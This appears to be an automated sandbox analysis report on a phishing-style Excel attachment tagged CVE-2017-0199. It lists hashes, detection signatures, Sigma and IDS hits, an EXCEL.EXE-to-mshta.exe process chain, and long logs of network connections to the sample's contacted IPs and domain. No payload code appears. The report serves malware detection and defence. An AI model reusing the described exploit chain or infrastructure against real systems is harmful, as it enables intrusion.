Windows Analysis Report
ENQUIRY - RFQ 674441-76450.xla.xlsx

Overview

General Information

Sample name: ENQUIRY - RFQ 674441-76450.xla.xlsx
Analysis ID: 1646794
MD5: 728def92ce2cf1e59208b5747c4f29e8
SHA1: b4a65a2275e8b1dbb37bb1ad7949f6f456da1773
SHA256: e822eabb8cd2fdd493bda865b2deebc1d4e272da9f1b17b8729de2289a31da3e
Tags: CVE-2017-0199, xla, xlsx, user-abuse_ch

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.]
  • System is w10x64
  • EXCEL.EXE (PID: 1896 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7844 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 7952 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 4572 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ENQUIRY - RFQ 674441-76450.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 1896, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7844, ProcessName: mshta.exe
Source: Network Connection, Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 43.152.182.96, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1896, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49687
Source: Network Connection, Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.9, DestinationIsIpv6: false, DestinationPort: 49687, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 1896, Protocol: tcp, SourceIp: 43.152.182.96, SourceIsIpv6: false, SourcePort: 80
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-24T09:33:31.711934+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49701 | 13.107.246.40 | 443 | TCP
2025-03-24T09:33:37.900489+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49703 | 13.107.246.40 | 443 | TCP
2025-03-24T09:33:37.900636+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49702 | 13.107.246.40 | 443 | TCP

AV Detection

Source: ENQUIRY - RFQ 674441-76450.xla.xlsx, Virustotal: Detection: 27%
Source: ENQUIRY - RFQ 674441-76450.xla.xlsx, ReversingLabs: Detection: 27%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.9:49699 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.9:49701 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\mshta.exe
Source: global traffic, DNS query: name: t.emobility.energy
Source: global traffic, DNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49703 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49702 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49687 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49687
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.9:49699 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.9:49699
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 217.154.55.185:80 -> 192.168.2.9:49700
Source: global trafficTCP traffic: 192.168.2.9:49700 -> 217.154.55.185:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 192.168.2.9:49689 -> 43.152.182.96:80
Source: global trafficTCP traffic: 43.152.182.96:80 -> 192.168.2.9:49689
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
Source: global trafficTCP traffic: 13.107.246.40:443 -> 192.168.2.9:49701
Source: global trafficTCP traffic: 192.168.2.9:49701 -> 13.107.246.40:443
